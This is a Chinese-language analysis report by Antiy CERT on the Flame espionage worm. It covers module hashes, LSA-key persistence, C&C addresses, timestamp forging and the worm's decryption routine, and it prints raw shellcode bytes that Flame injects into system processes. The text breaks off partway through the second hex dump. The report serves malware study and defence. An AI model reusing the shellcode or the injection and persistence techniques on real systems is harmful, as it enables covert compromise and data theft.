Flame蠕虫样本集分析报告

安天安全研究与应急处理中心(Antiy CERT)

首次发布时间:2012年5月31日

本版本更新时间:2012年8月17日

 


PDF报告下载


分析小组絮语

    在我们工作的经历中还从没出现过这样的情况,一个分析小团队接近一个月的时间里,只面对一个恶意代码,并且还计划把工作继续下去,尽管在Stuxnet蠕虫中,我们尝试这样做过,但小组只工作了不到10天的时间,便浅尝辄止了。我们自陆续对Stuxnet、Duqu和Flame进行分析以来,我们逐渐的发现作为传统的AVER,在面对挑战和变革时传统的方法必须被打破。
传统的恶意代码主要目的为感染更多的计算机,后期演化成利益链条,所以其开发简单直接,功能明确,他们往往采用单体的文件,尽量减小体积以利于可靠传播,因此对其进行分析也相对容易。从另一个意义上说,地下经济虽然催生了类似Trojan、Bot等的爆发,但并没有影响到攻守双方的平衡,反病毒团队依托捕获体系和后端的自动化分析平台,几乎所有的反病毒厂商都能在很少的人工分析的工作支持下,应对海量的恶意代码。甚至仅凭自动化系统,在无人值守的情况下,新的检测规则同样可以从新的样本被提取出来,并分发给反病毒产品。因此我们滋长了惰性,过多的依赖沙箱和其他的自动化环节,甚至我们一度以为病毒分析工程师的使命正在被淡化和消亡。
而今天在面对Stuxnet、Flame等病毒时,一切不同了,用户更多询问我们的不是“如何发现、你的产品能不能杀掉”,而是“他到底干了什么?”、“我如何避免今后类似的攻击?”这些都让我们必须从分析流水线的操纵者,重新变回贴身肉搏的战士,我们需要回到短兵相接的现场勘察、环境复现和深入细腻的后端分析中。
Flame的文件数量和总体大小都是令人震撼的,与之前我们看到的APT场景下的恶意代码一样,类似样本采用模块化,框架化开发,结构复杂,文件较多,但Flame几乎达到了难以想象的程度。其模块分工亦导致了其隐蔽性较好,躲避杀软的能力较高。并且内部封装了各种加密模块来隐藏重要信息。这些体积庞大结构复杂的恶意代码在APT攻击中扮演着精密的任务,其对环境特征的监察非常准确,如果发现环境信息不符合其感染的目的则直接退出,并完全清除痕迹,这种样本不会大规模爆发,依托大量配置信息和远程调度完成工作,在被发现时一般目的已经达成。我们习惯性的分析单体病毒样本,依托自动化分析结果和少量的反汇编,包括那些在分析报告之前,加一个带有HASH值的样本标签的习惯工作思路,应对这种复杂的局面时,都显得那样的幼稚和过时。
因此面对这么多的样本和衍生文件,我们最终选择了蚂蚁搬家的方法,小组每人分工分析不同的模块,并把分析结果随手记录下来,我们不指望最终有一篇巨大的研究报告,而是能把这些点滴集合起来,为应对这种攻击提供一些研究基础。小组内有两条线路,一是主模块分析,主模块文件体积有6MB多,分析时投入的时间较多。主要对其加密算法、字符串信息、整体结构等方面进行分析。二是其它模块功能分析,在分析模块功能时发现部分模块具有相同的功能如:收集信息、遍历进程、屏幕窃取等。在分析过程中我们还在内存中发现很多有意思的信息,但我们依然陷于“猜谜”之中。
我们在后续会继续我们的工作,并力图把更多结果,更新到这份报告之上。在一段时间内,能够持续去做一件有意义的事,是幸福的,特别是与伙伴在一起做的时候。

 

安天实验室安全研究与应急处理中心
Pluck、Sky、White、Pillcor
2012.07.31

1 事件背景

安天实验室于2012年5 月28 日起陆续捕获到Flame蠕虫的样本,截止到目前安天已经累计捕获Flame蠕虫主文件的变种数6个,其它模块为20多个不同HASH值的样本实体,并通过这些样本进一步生成了其他的衍生文件。安天成立了专门的分析小组,经过持续分析,发现它是采用多模块化复杂结构实现的信息窃取类型的恶意软件。其主模块文件大小超过6MB。包含了大量加密数据、内嵌开源软件代码(如Lua等)、漏洞攻击代码、模块配置文件、多种加密压缩算法,信息盗取等多种模块。在漏洞攻击模块中发现了Stuxnet使用过的USB攻击模块,Stuxnet事件是发生在2010年针对伊朗核设施的APT攻击事件[1]。
据外界现有分析,该恶意软件已经非常谨慎地运作了至少两年时间[2],它不但能够窃取文件,对用户系统进行截屏,通过USB传播禁用安全厂商的安全产品,并可以在一定条件下传播到其他系统,还有可能利用微软Windows系统的已知或已修补的漏洞发动攻击,进而在某个网络中大肆传播。
目前业内各厂商对该蠕虫的评价如下:McAfee认为此威胁是Stuxnet和Duqu攻击的继续[3];卡巴斯基实验室则认为Flame攻击是目前发现的最为复杂的攻击之一[4],它是一种后门木马并具有蠕虫的特征。赛门铁克认为,Flame与之前两种威胁Stuxnet和Duqu一样,其代码非一人所为,而是由一个有组织、有资金支持并有明确方向性的网络犯罪团体所编写。

2 Flame蠕虫文件信息

表 2-1现有Flame蠕虫PE文件与功能一览表

文件名

文件MD5与大小

功能

mssecmgr.ocx

b51424138d72d343f22d03438fc9ced5       (1,236,992字节)

0a17040c18a6646d485bde9ce899789f       (6,172,160字节)

ee4b589a7b5d56ada10d9a15f81dada9 (892,417字节)

e5a49547191e16b0a69f633e16b96560       (6,166,528字节)

bdc9e04388bda8527b398a8c34667e18 (1,236,992字节)

37c97c908706969b2e3addf70b68dc13       (391,168 字节)

主模块运行后会将其资源文件中的多个功能模块解密释放出来,并将它们注入到多个系统 进程中。它通过调用Lua来执行脚本完成指定功能。

advnetcfg.ocx

f0a654f7c485ae195ccf81a72fe083a2   (643,072 字节)

8ed3846d189c51c6a0d69bdc4e66c1a5       (421,888 字节)

bb5441af1e1741fca600e9c433cb1550 (643,944 字节)

由主模块释放:截取屏幕信息。

msglu32.ocx

d53b39fb50841ff163f6e9cfd8b52c2e  (1,721,856 字节)

2512321f27a05344867f381f632277d8 (1,729,536 字节)

由主模块释放:遍历系统中的各种类型的文件,读取特定文件类型文件的信息,将其写入到SQL数据库中,同时也可以收集文件中与地域性相关的一些信息。

nteps32.ocx

c9e00c9d94d1a790d5923b050b0bd741 (827,392 字节)

e66e6dd6c41ece3566f759f7b4ebfa2d  (602,112 字节)

5ecad23b3ae7365a25b11d4d608adffd (827,392 字节)

由主模块释放:用来键盘记录和截取屏幕信息。对一些邮件域名进行监控。

rpcns4.ocx

soapr32.ocx

296e04abb00ea5f18ba021c34e486746 (160,768 字节)

1f9f0baa3ab56d72daab024936fdcaf3  (188,416 字节)

cc54006c114d51ec47c173baea51213d (253,952 字节)

e6cb7c89a0cae27defa0fd06952791b2 (349,596 字节)

用来收集信息的功能模块。获取系统中的一些信息,例如:安装的软件信息、网络信息、无线网络信息、USB信息、时间以及时区信息等。

comspol32.ocx

20732c97ef66dd97389e219fc0182cb5 (634,880 字节)

分析中。

00004784.dll

(jimmy.dll)

ec992e35e794947a17804451f2a8857e (483,328 字节)

是用来收集用户计算机信息,包括窗体标题、注册表相关键值信息、计算机名,磁盘类型等。

wusetupv.exe

1f61d280067e2564999cac20e386041c       (29,928 字节)

收集本机各个接口的信息、进程信息,注册表键值信息等。

DSMGR.DLL

browse32.ocx

2afaab2840e4ba6af0e5fa744cd8f41f   (116,224 字节)

7d49d4a9d7f0954a970d02e5e1d85b6b(458,869 字节)

用来删除恶意软件所有痕迹,防止取证分析。

boot32drv.sys00004069.exe

06a84ad28bbc9365eb9e08c697555154(49,152 字节)

它是一个加密数据文件并不是PE文件,加密方式是通过与0xFFxor操作。

表 2-2Flame蠕虫所有衍生文件和其它文件列表

Ef_trace.log

dstrlog.dat

mscorest.dat

soapr32.ocx

winrt32.dll

GRb9M2.bat

dstrlogh.dat

mscrypt.dat

srcache.dat

winrt32.ocx

Lncache.dat

fmpidx.bin

msglu32.ocx

sstab.dat

wpab32.bat

Temp~mso2a0.tmp

indsvc32.dll

mspovst.dat

sstab0.dat

wpgfilter.dat

Temp~mso2a1.tmp

indsvc32.ocx

mssui.drv

sstab1.dat

~8C5FF6C.tmp

Temp~mso2a2.tmp

lmcache.dat

mssvc32.ocx

sstab10.dat

~DF05AC8.tmp

advnetcfg.ocx

ltcache.dat

nt2cache.dat

sstab11.dat

~DFD85D3.tmp

advpck.dat

m3aaux.dat

ntaps.dat

sstab12.dat

~DFL543.tmp

audfilter.dat

m3afilter.dat

ntcache.dat

sstab15.dat

~DFL544.tmp

authcfg.dat

m3asound.dat

nteps32.ocx

sstab2.dat

~DFL546.tmp

authpack.ocx

m4aaux.dat

pcldrvx.ocx

sstab3.dat

~HLV084.tmp

boot32drv.sys

m4afilter.dat

posttab.bin

sstab4.dat

~HLV294.tmp

ccalc32.sys

m4asound.dat

qpgaaux.dat

sstab5.dat

~HLV473.tmp

commgr32.dll

m5aaux.dat

rccache.dat

sstab6.dat

~HLV751.tmp

comspol32.dll

m5afilter.dat

rpcnc.dat

sstab7.dat

~HLV927.tmp

comspol32.ocx

m5asound.dat

scaud32.exe

sstab8.dat

~KWI988.tmp

ctrllist.dat

mixercfg.dat

scsec32.exe

sstab9.dat

~KWI989.tmp

dmmsap.dat

mixerdef.dat

sdclt32.exe

syscache.dat

~TFL848.tmp

domm.dat

mlcache.dat

secindex.dat

syscache3.dat

~TFL849.tmp

domm2.dat

modevga.com

sndmix.drv

watchxb.sys

~ZFF042.tmp

domm3.dat

mpgaaux.dat

mscorest.dat

wavesup3.drv

~a28.tmp

dommt.dat

mpgaud.dat

mscrypt.dat

winconf32.ocx

~a38.tmp

~dra51.tmp

~dra52.tmp

~dra53.tmp

~dra61.tmp

~rei524.tmp

~rei525.tmp

~rf288.tmp

 

 

 

3功能分析

3.1 MSSECMGR.OCX主模块分析

蠕虫主模块是一个文件名为mssecmgr.ocx的DLL文件,我们发现该模块已有多个衍生版本,文件大小为6M,运行后会连接C&C服务器,并试图下载或更新其它模块。主模块不同时期在被感染的机器上文件名有不同,但扩展名都为“OCX”。运行后的主模块会将其资源文件中的多个功能模块解密释放出来,并将多个功能模块注入到多个进程中,功能模块具有获取进程信息、键盘信息、硬件信息、屏幕信息、麦克风、存储设备、网络、WIFI、蓝牙、USB等多种信息的功能。所记录的信息文件存放在%Windir%\temp\下。该蠕虫会先对被感染系统进行勘察,如果不是其想要的攻击对象,它将会自动从被感染系统卸载掉。蠕虫最有可能是通过欺骗微软升级服务器对本地网络传播和通过一个USB接入设备进行传播。蠕虫还能够发现有关其周边设备的信息。通过蓝牙装置,它会寻找其它设备,比如手机或笔记本电脑等。此蠕虫和以往蠕虫有很大程度上的不同,首先主模块体积很大,并包含多个功能模块,内嵌Lua解释器和大量Lua脚本,进行高层的功能扩展。启动方式比较特殊,具有多种压缩和加密方式。

本地行为
  • 添加注册表
  • HKLM_SYSTEM\CurrentControlSet\Control\Lsa
  • AuthenticationPackages = mssecmgr.ocx
  • 注:该键值会达到开机加载mssecmgr.ocx的目的。该文件路径为:%system32%\mssecmgr.ocx

  • 文件运行后会释放以下文件:
  • 通过对“146”资源进行释放并加载运行,以下为资源释放的模块:

    文件

    MD5

    %System32%\advnetcfg.ocx

    BB5441AF1E1741FCA600E9C433CB1550

    %System32%\boot32drv.sys

    C81D037B723ADC43E3EE17B1EEE9D6CC

    %System32%\msglu32.ocx

    D53B39FB50841FF163F6E9CFD8B52C2E

    %Syste32m%\nteps32.ocx

    C9E00C9D94D1A790D5923B050B0BD741

    %Syste32m%\soapr32.ocx

    296E04ABB00EA5F18BA021C34E486746

    %Syste32m%\ccalc32.sys   

    5AD73D2E4E33BB84155EE4B35FBEFC2B

    其它文件:

  • %Windir%\Ef_trace.log
  • 在%ProgramFiles%\Common Files\Microsoft Shared\MSAudio目录下为各模块的配置信息和自身副本文件,从网络中更新或下载新模块配置也会在这里,列表如下:

  • Audcache
  • audfilter.dat
  • dstrlog.dat
  • lmcache.dat
  • ntcache.dat
  • mscrypt.dat
  • 在分析过程中发现以上文件可能为病毒的配置文件,当病毒要进行一个操作前先读取此文件中的一块信息,然后完成其指定的操作。病毒先将以上文件释放然后删除一次,最后又重新释放,推测为不同功能之间的重复操作导致。

  • wavesup3.drv(自身副本)
  • wpgfilter.dat
  • 根据“146”资源配置还可能会存在以下文件目录:

  • %ProgramFiles%\Common Files\Microsoft Shared\MSSecurityMgr
  • %ProgramFiles%\Common Files\Microsoft Shared\MSAudio
  • %ProgramFiles%\Common Files\Microsoft Shared\MSAuthCtrl
  • %ProgramFiles%\Common Files\Microsoft Shared\MSAPackages
  • %ProgramFiles%\Common Files\Microsoft Shared\MSSndMix
  • 遍历安全进程列表
  • 关于遍历安全进程列表内容参见附录一(详见附录一:为Mssecmgr.ocx文件中的遍历安全进程列表,其列表和其它模块中的一些遍历进程列表中一些进程是相同的。)

  • 在主模块中发现一个Lua脚本调用函数列表内容参见附录六。(详见附录六:为Mssecmgr.ocx文件中的Lua脚本调用函数列表内、容)
  • 该蠕虫部分功能主要有,扫描网络资源、窃取指定信息、进行屏幕截图、记录语音通话、利用 PE 加密资源、用 SQLite 数据库存储收集到的信息、通过 SSH HTTPS 协议与总控服务器通信、检测上百种安全防护产品、使用加密记录文件、通过 USB和局域网攻击进行传播,并使用SSH HTTPS 协议与C&C服务器通信等。
  • 网络行为
  • 访问地址1:http://windowsuate.microsoft.com/
    访问地址2:http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx
    协议:Http
    端口:80
    访问地址:91.135.66.118[traffic-spot.com][traffic-spot.biz][smart-access.net][quick-net.info]
    协议:Https
    端口:443
    病毒运行后,首先访问Windows系统升级服务器地址,然后对IP地址为91.135.66.118的四个域名进行访问,并回传数据。

     

    图 3-1 Post数据

    连接所有的域名信息参加附录二(附录二:连接所有域名列表)。

    样本文件启动加载顺序

    图 3-2文件启动加载顺序

    该病毒的加载方式有两种,一种是在注册表中添加键值,另一种是利用批处理文件来执行DOS命令运行Rundll32.exe加载主模块运行。
    首先查询注册表HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SeCEdit和查看%Program Files%\Common Files\Microsoft Shared\MSAudio\wavesup3.drv文件是否存在。写入HKLM\System\CurrentControlSet\Control\TimeZoneInformation\StandardSize值为:114。
    创建MSSecurityMgr目录,写入文件Mscrypt.dat,在查询信息文件时每查询后会把更改时间写成1601-1-1 08:00:00,经过1分钟后写入Wpgfilter.dat文件在查询信息文件时每查询后会把更改时间写成1601-1-1 08:00:00,经过1分钟左右后写入Wavesup3.drv文件查询后会把更改时间写成1601-1-1 08:00:00,写入文件Wavesup3.drv后会写入Audcache文件接着写入Audfilter.dat文件。然后查找以下文件:

  • C:\Documents and Settings\Administrator\Local Settings\Temp\dat3C.tmp
  • C:\Documents and Settings\All Users\Local Settings\Temp\dat3C.tmp
  • C:\Documents and Settings\Default User\Local Settings\Temp\dat3C.tmp
  • C:\Documents and Settings\LocalService\Local Settings\Temp\dat3C.tmp
  • C:\Documents and Settings\NetworkService\Local Settings\Temp\dat3C.tmp
  • C:\WINDOWS\Temp\dat3C.tmp
  • 然后注入进程Services.exe调用系统文件Shell32.dll文件,并劫持Shell32.dll内容,把Wpgfilter.dat的内容加载到Shell32.dll中,再加载Audcache文件内容到Shell32.dll中。再加载Wavesup3.drv文件,然后释放Neps32.exe文件、Comspol32.ocx、Advnetcfg.ocx、Boot32drv.sys、Msglu32.ocx,并将它们的时间改为Kernel32.dll文件的时间,为了躲避安全软件的检测。
    然后注入到Winlogon.exe进程中调用系统文件Shell32.dll文件,并劫持Shell32.dll内容,把Netps32.ocx和Ccalc32.sys的内容加载到Shell32.dll中。并将它们的时间改为Kernel32.dll文件的时间,为了躲避安全软件的检测。
    通过注入Explore.exe进程调用系统文件Shell32.dll文件,并劫持Shell32.dll内容,并使其创建Iexplore.exe进程,把Wpgfilter.dat的内容加载到Shell32.dll中,然后再加载Audcache文件内容到Shell32.dll中。几分钟后加载Wavesup3.drv文件。查询注册表系统服务项,连接微软升级服务器,然后再连接病毒服务器。
    程序中大量数据被加密。加密算法代码位置如下:

    0x1000E3F5  proc near

                    test    edx, edx

                    push    esi

                    mov     esi, eax

                    jbe     short 0x1000E42F

                    push    ebx

                    push    edi

                    push    0Bh

                    pop     edi

                    sub     edi, esi

    0x1000E403:

                    lea     ecx, [edi+esi]

                    lea     eax, [ecx+0Ch]

                    imul    eax, ecx

                    add     eax, dword_10376F70

                    mov     ecx, eax

                    shr     ecx, 18h

                    mov     ebx, eax

                    shr     ebx, 10h

                    xor     cl, bl

                    mov     ebx, eax

                    shr     ebx, 8

                    xor     cl, bl

                    xor     cl, al

                    sub     [esi], cl

                    inc     esi

                    dec     edx

                    jnz     short 0x1000E403

                    pop     edi

                    pop     ebx

    0x1000E42F:

                    pop     esi

                    retn

    0x1000E3F5  endp

    对该函数的调用有2个函数。分别位置如下:

    1000E451                 movzx   edx, word ptr [ebx+9]

    1000E455                 lea     eax, [ebx+0Bh]

    1000E458                 mov     [ebp+8], eax

    1000E45B                 call    0x1000E3F5

     

    1000E498                 movzx   edx, word ptr [esi+12h]

    1000E49C                 lea     ebx, [esi+14h]

    1000E49F                 mov     eax, ebx

    1000E4A1                 call    0x1000E3F5

    解密算法说明:
    函数有两个参数:edx [解密字符串长度],eax[解密字符串的起始地址]
    返回值:eax[解密后字符串的起始地址]
    解密算法:
    ECX=(0xBh+n)*(0xBh+0xCh+n)+[0x10376F70h]
    注意:n是要解密的字符距起始字符的距离.
    CL=(M1)xor(M2)xor(M3)xor(M4)
    解密数据 = 加密数据 – CL
    第一次调用:
    函数有一个参数:arg.1[地址]
    解密字符串长度:[word]arg.1+0x9h
    解密字符串起始地址:[dword]arg.1+0xBh
    返回值: 解密后字符串的起始地址
    第二次调用:
    函数有一个参数:arg.1[address]
    解密字符串长度: [word]arg.1+0x12h
    解密字符串起始地址: [dword]arg.1+0x14h
    返回值: 解密后字符串的起始地址

    实现细节

    对该病毒的调试过程中发现其将所有的指针通过函数EncodePointer进行编码后存储到内部结构中(这也与Duqu的实现方式类似),当使用时再调用DecodePointer解码使用,这样做会使对其静态分析变得极其困难。这个病毒使用了通过获取系统dll文件的导出函数表并循环查找指定函数的方法来动态获取函数地址,此方法是恶意代码的惯用手段,详见代码。

    mov     eax, [ebp-4]

    mov     eax, [esi+eax*4]        //export func name offset

    add     eax, [ebp+module_handle]

    push    [ebp+func_name_size]

    mov     [ebp+export_func_name], eax

    push    eax

    call    IsBadReadPtr

    test    eax, eax

    jnz     0x1000BE19

    push    [ebp+func_name]

    push    [ebp+export_func_name]

    call    lstrcmpiA

    test    eax, eax

    jz      short 0x1000BE2B

    图 3-3动态获取指定Dll文件中的函数

    该恶意代码在系统路径%ProgramFiles%\Common Files\Microsoft Shared下创建MSSecurityMgr文件夹,并将一些配置文件保存到此目录中。恶意代码会在进程环境变量中保存系统关键目录(WINDOWS目录、SYSTEM32目录、系统临时目录)和自身程序的文件路径。并通过文件查找的API函数来寻找Kernel32.dll文件,并将恶意代码所创建的文件或文件夹的时间设置为与Kernel32.dll文件相同。起到隐藏痕迹的目的。
    该恶意代码先将自身复制为%System32%\mssecmgr.ocx。再通过修改注册表达到启动目的,修改的注册表键值为:
    “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa”
    下的“Authentication Packages”。将其值中追加病毒的模块名如图5。此注册表键值的作用是列出了用户身份验证程序包,当用户登录到系统时加载并调用[5]。从而达到开机启动的目的。

    图 3-4修改的注册表键值

     

    病毒通过遍历进程来查找Explorer.exe进程并通过WriteProcessMemory将Shell Code写入到Explorer.exe进程中。并且通过CreateRemoteTheread 函数创建远程线程执行ShellCode。
    调试发现加密数据,并将其释放到指定目录下。
    C:\Program Files\Common Files\Microsoft Shared\MSSecurityMgr\mscrypt.dat
    此模块中的数据应为配置数据
    分析程序的进程操作行为
    程序利用OpenProcess打开services.exe进程,句柄为0x174
    通过函数WriteProcessMemory向Services.exe进程写入Shellcode,这也是恶意代码的惯用手法,存在明显恶意行为的代码注入到系统进程中执行,以躲避杀软查杀。
    Sehll Code内容,长度为0x82

    0x55,0x8B,0xEC,0x51,0x53,0x56,0x57,0x33,0xFF,0x89,0x7D,0xFC,0xE8,0x00,0x00,0x00,

    0x00,0x58,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x6A,0x64,0x59,0x48,0x49,0x89,0x45,0xFC,

    0x74,0x5B,0x81,0x38,0xBA,0xBA,0x0D,0xF0,0x75,0xF1,0x8D,0x70,0x04,0x8B,0x0E,0x6A,

    0xFF,0xFF,0x31,0x8B,0xD8,0xFF,0x50,0x08,0x85,0xC0,0x75,0x2C,0x8B,0x06,0x83,0x7C,

    0x07,0x0C,0x00,0x74,0x0E,0xFF,0x75,0x10,0x03,0xC7,0xFF,0x75,0x0C,0xFF,0x70,0x08,

    0xFF,0x50,0x0C,0x81,0xC7,0x20,0x02,0x00,0x00,0x81,0xFF,0x00,0x55,0x00,0x00,0x72,

    0xDB,0x8B,0x06,0xFF,0x30,0xFF,0x53,0x0C,0xFF,0x75,0x10,0x8B,0x06,0xFF,0x75,0x0C,

    0xFF,0x75,0x08,0xFF,0x50,0x04,0x5F,0x5E,0x5B,0xC9,0xC2,0x0C,0x00,0x33,0xC0,0x40,

    0xEB,0xF4

    第二段Shell Code会被后面创建的远程线程直接执行。
    ShellCode内容,长度为0x70c

    0x55,0x8B,0xEC,0x83,0xEC,0x70,0x53,0x33,0xDB,0x56,0x8B,0x75,0x08,0x57,0x33,0xC0,

    0x89,0x5D,0xA8,0x8D,0x7D,0xAC,0xAB,0xAB,0x8D,0x86,0x74,0x04,0x00,0x00,0x50,0xC6,

    0x45,0xFA,0x00,0x89,0x5D,0xE8,0x88,0x5D,0xFB,0x89,0x5D,0xE4,0x89,0x5D,0xEC,0x89,

    0x5D,0xC8,0x89,0x5D,0xD0,0x89,0x5D,0xD4,0x89,0x5D,0xBC,0x89,0x5D,0xC4,0x89,0x5D,

    0xE0,0x89,0x5D,0xDC,0xC7,0x45,0xF0,0x01,0x00,0xFF,0xFF,0x89,0x9E,0x2C,0x0B,0x00,

    0x00,0xFF,0x56,0x10,0x3B,0xC3,0x89,0x45,0xC0,0x75,0x0A,0xB8,0x02,0x00,0xFF,0xFF,

    0xE9,0xA0,0x06,0x00,0x00,0x8D,0x86,0x81,0x04,0x00,0x00,0x50,0xFF,0x75,0xC0,0xFF,

    0x56,0x1C,0x3B,0xC3,0x75,0x0A,0xB8,0x03,0x00,0xFF,0xFF,0xE9,0x85,0x06,0x00,0x00,

    0x53,0x8D,0x4D,0xDC,0x51,0x6A,0x01,0x8D,0x8E,0xB6,0x04,0x00,0x00,0x51,0xFF,0xD0,

    0x85,0xC0,0x75,0x0A,0xB8,0x04,0x00,0xFF,0xFF,0xE9,0x67,0x06,0x00,0x00,0x8B,0x45,

    0xDC,0x89,0x45,0xAC,0x8D,0x86,0x30,0x0B,0x00,0x00,0x8B,0x78,0x3C,0x03,0xF8,0xC7,

    0x45,0xA8,0x0C,0x00,0x00,0x00,0x89,0x5D,0xB0,0x0F,0xB7,0x47,0x14,0x8D,0x44,0x38,

    0x18,0x89,0x45,0xCC,0x8B,0x47,0x08,0x25,0x07,0xF8,0xFF,0xFF,0x05,0x00,0x00,0x90,

    0xD6,0x3D,0x00,0x00,0x00,0x06,0x0F,0x87,0x24,0x06,0x00,0x00,0x38,0x9E,0x20,0x09,

    0x00,0x00,0x8B,0x47,0x50,0x89,0x45,0x08,0x74,0x67,0x53,0x53,0x6A,0x03,0x53,0x6A,

    0x01,0x68,0x00,0x00,0x00,0x80,0x8D,0x86,0x22,0x09,0x00,0x00,0x50,0xFF,0x56,0x50,

    0x83,0xF8,0xFF,0x89,0x45,0xF4,0x75,0x0A,0xB8,0x06,0x00,0xFF,0xFF,0xE9,0xF3,0x05,

    0x00,0x00,0x53,0xFF,0x75,0x08,0x53,0x68,0x02,0x00,0x00,0x01,0x53,0x50,0xFF,0x56,

    0x28,0xFF,0x75,0xF4,0x89,0x45,0xD8,0xFF,0x56,0x4C,0x39,0x5D,0xD8,0x75,0x0A,0xB8,

    0x07,0x00,0xFF,0xFF,0xE9,0xCC,0x05,0x00,0x00,0xFF,0x75,0x08,0x53,0x53,0x6A,0x04,

    0xFF,0x75,0xD8,0xFF,0x56,0x30,0xFF,0x75,0xD8,0x89,0x45,0xF4,0xFF,0x56,0x4C,0xEB,

    0x0F,0x6A,0x04,0x68,0x00,0x10,0x00,0x00,0x50,0x53,0xFF,0x56,0x04,0x89,0x45,0xF4,

    0x39,0x5D,0xF4,0x75,0x0A,0xB8,0x08,0x00,0xFF,0xFF,0xE9,0x96,0x05,0x00,0x00,0x8D,

    0x45,0xC4,0x50,0x6A,0x04,0xFF,0x75,0x08,0xFF,0x75,0xF4,0xFF,0x56,0x0C,0x85,0xC0,

    0x75,0x0C,0xC7,0x45,0xF0,0x09,0x00,0xFF,0xFF,0xE9,0x8D,0x04,0x00,0x00,0xFF,0x77,

    0x50,0x53,0xFF,0x75,0xF4,0xFF,0x56,0x24,0xFF,0x77,0x54,0x8D,0x86,0x30,0x0B,0x00,

    0x00,0x50,0xFF,0x75,0xF4,0xFF,0x56,0x20,0x83,0xC4,0x18,0x66,0x39,0x5F,0x06,0x89,

    0x5D,0x08,0x76,0x35,0x0F,0xB7,0x45,0x08,0x8B,0x4D,0xCC,0x6B,0xC0,0x28,0x03,0xC1,

    0xFF,0x70,0x10,0x8B,0x50,0x14,0x8B,0x40,0x0C,0x03,0x45,0xF4,0x8D,0x8E,0x30,0x0B,

    0x00,0x00,0x03,0xD1,0x52,0x50,0xFF,0x56,0x20,0x83,0xC4,0x0C,0xFF,0x45,0x08,0x66,

    0x8B,0x45,0x08,0x66,0x3B,0x47,0x06,0x72,0xCB,0x8B,0x45,0xF4,0x2B,0x47,0x34,0x89,

    0x45,0xB8,0x0F,0x84,0x8A,0x00,0x00,0x00,0x8B,0x87,0xA0,0x00,0x00,0x00,0x03,0x45,

    0xF4,0x3B,0x45,0xF4,0x75,0x0C,0xC7,0x45,0xF0,0x0A,0x00,0xFF,0xFF,0xE9,0x09,0x04,

    0x00,0x00,0x8B,0x8F,0xA4,0x00,0x00,0x00,0x03,0xC8,0x3B,0xC1,0x89,0x4D,0xB4,0x73,

    0x61,0x8B,0x50,0x04,0x8B,0x08,0x03,0x4D,0xF4,0x83,0xEA,0x08,0xF7,0xC2,0xFE,0xFF,

    0xFF,0xFF,0x89,0x5D,0x08,0x76,0x43,0x8B,0x55,0x08,0x0F,0xB7,0x54,0x50,0x08,0x81,

    0xE2,0xFF,0x0F,0x00,0x00,0x89,0x55,0xD8,0x8B,0x55,0x08,0x0F,0xB7,0x54,0x50,0x08,

    0x0F,0xB7,0xD2,0xC1,0xEA,0x0C,0x74,0x10,0x83,0xFA,0x03,0x75,0x3F,0x0F,0xB7,0x55,

    0xD8,0x8B,0x5D,0xB8,0x03,0xD1,0x01,0x1A,0x8B,0x50,0x04,0xFF,0x45,0x08,0x83,0xEA,

    0x08,0xD1,0xEA,0x33,0xDB,0x39,0x55,0x08,0x72,0xBD,0x03,0x40,0x04,0x3B,0x45,0xB4,

    0x72,0x9F,0x8B,0x87,0x80,0x00,0x00,0x00,0x03,0x45,0xF4,0x3B,0x45,0xF4,0x75,0x18,

    0xC7,0x45,0xF0,0x0C,0x00,0xFF,0xFF,0xE9,0x7F,0x03,0x00,0x00,0xC7,0x45,0xF0,0x0B,

    0x00,0xFF,0xFF,0xE9,0x73,0x03,0x00,0x00,0x39,0x58,0x0C,0x0F,0x84,0x80,0x00,0x00,

    0x00,0x83,0xC0,0x10,0x89,0x45,0x08,0x8B,0x45,0x08,0x83,0x38,0x00,0x74,0x70,0x83,

    0x78,0xF4,0x00,0x0F,0x85,0xB9,0x00,0x00,0x00,0x8B,0x58,0xFC,0x03,0x5D,0xF4,0x53,

    0xFF,0x56,0x18,0x85,0xC0,0x0F,0x84,0xB0,0x00,0x00,0x00,0x53,0xFF,0x56,0x10,0x85,

    0xC0,0x89,0x45,0xD8,0x0F,0x84,0xAA,0x00,0x00,0x00,0x8B,0x45,0x08,0x8B,0x18,0x03,

    0x5D,0xF4,0xEB,0x29,0x8B,0x03,0x85,0xC0,0x79,0x07,0x25,0xFF,0xFF,0x00,0x00,0xEB,

    0x08,0x8B,0x4D,0xF4,0x03,0xC1,0x83,0xC0,0x02,0x50,0xFF,0x75,0xD8,0xFF,0x56,0x1C,

    0x85,0xC0,0x89,0x03,0x0F,0x84,0x83,0x00,0x00,0x00,0x83,0xC3,0x04,0x83,0x3B,0x00,

    0x75,0xD2,0x83,0x45,0x08,0x14,0x8B,0x45,0x08,0x83,0x78,0xFC,0x00,0x75,0x88,0x33,

    0xDB,0x66,0x39,0x5F,0x06,0x89,0x5D,0x08,0x0F,0x86,0xBA,0x00,0x00,0x00,0x0F,0xB7,

    0x45,0x08,0x8B,0x4D,0xCC,0x6B,0xC0,0x28,0x03,0xC1,0x8B,0x48,0x24,0xF7,0xC1,0x20,

    0x00,0x00,0x20,0x74,0x07,0xC7,0x45,0xC8,0x01,0x00,0x00,0x00,0x33,0xD2,0x42,0x85,

    0xC9,0x79,0x03,0x89,0x55,0xD0,0xF7,0xC1,0x00,0x00,0x00,0x40,0x74,0x03,0x89,0x55,

    0xD4,0x39,0x5D,0xC8,0x8B,0xCA,0x74,0x42,0x39,0x5D,0xD0,0x74,0x2E,0x6A,0x40,0x59,

    0xEB,0x49,0xC7,0x45,0xF0,0x0D,0x00,0xFF,0xFF,0xEB,0x19,0xC7,0x45,0xF0,0x0E,0x00,

    0xFF,0xFF,0xEB,0x10,0xC7,0x45,0xF0,0x0F,0x00,0xFF,0xFF,0xEB,0x07,0xC7,0x45,0xF0,

    0x10,0x00,0xFF,0xFF,0x33,0xDB,0xE9,0x70,0x02,0x00,0x00,0x8B,0x4D,0xD4,0xF7,0xD9,

    0x1B,0xC9,0x83,0xE1,0x10,0x83,0xC1,0x10,0xEB,0x11,0x39,0x5D,0xD4,0x74,0x0C,0x33,

    0xC9,0x39,0x5D,0xD0,0x0F,0x95,0xC1,0x8D,0x4C,0x09,0x02,0x8B,0x50,0x08,0x8B,0x40,

    0x0C,0x03,0x45,0xF4,0x89,0x55,0xB4,0x8D,0x55,0xC4,0x52,0x51,0xFF,0x75,0xB4,0x50,

